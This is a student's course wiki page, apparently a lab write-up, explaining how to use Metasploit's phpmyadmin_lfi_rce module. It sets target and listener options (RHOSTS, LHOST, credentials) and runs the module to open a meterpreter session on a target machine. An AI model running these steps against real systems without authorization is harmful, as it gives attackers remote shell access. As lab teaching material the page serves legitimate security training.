Metasploit - Robertsegee/SEC335 GitHub Wiki

In this lab we made use of the metasploit tool in order to break into two different machines and gain a foothold. The first step was to enter the msf console mode, this is done through the command:
msfconsole -q

---

The next step is to identify the specific exploit which is going to be used. In the following command I will show the exploit I used in order to break into a box that was using phpmyadmin
use exploit/multi/http/phpmyadmin_lfi_rce
After this is done you must adjust the options for the exploit so that it can actually attack the target, you can check the options by using the options command which is:
options

---

Then you must set the option by using the set command, the following commands were used in this assignmnet:
set USERNAME (username)
set PASSWORD (password)
set RHOSTS (ip of target)
set LHOST (your ip)
There are other options that can be used such as:
PROXIES- proxy chanin of format type:host:port
RPORT - determine what port you are attacking
TARGETURI - base directory path
SSL - negotiate ssl/tls for outgoing connections
VHOST - HTTP server virtual host
LPORT - what port you are listening from
After you have adjusted the settings needed, you use the run command to then initiate the attack. After waiting a bit you will be presented with a line saying
metapreter>
This indicates the attack worked and a session was opened